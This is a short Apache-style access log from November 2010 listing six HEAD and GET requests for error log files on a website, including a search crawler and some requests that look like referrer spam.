67.184.233.166 - - [21/Nov/2010:05:33:40 -0800] "HEAD /sharkbomb-error.log HTTP/1.0" 200 - "exercisedvds.com" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
208.80.194.26 - - [21/Nov/2010:06:04:21 -0800] "GET / HTTP/1.0" 200 6182 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; DigExt; (R1 1.5); MSN 9.0;MSN 9.1; MSNbVZ02; MSNmen-us; MSNcOTH)"
93.158.148.31 - - [21/Nov/2010:06:21:15 -0800] "GET /jasoncmartin-error.log HTTP/1.1" 200 1663 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
91.201.66.28 - - [21/Nov/2010:06:56:08 -0800] "GET /terhanian-error.log HTTP/1.0" 200 - "http://redhatcasino.com/articles/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
91.201.66.28 - - [21/Nov/2010:06:56:08 -0800] "GET /terhanian-error.log HTTP/1.0" 200 - "http://redhatcasino.com/articles/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
91.201.66.28 - - [21/Nov/2010:06:56:09 -0800] "GET /terhanian-error.log HTTP/1.0" 200 - "http://redhatcasino.com/articles/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1"
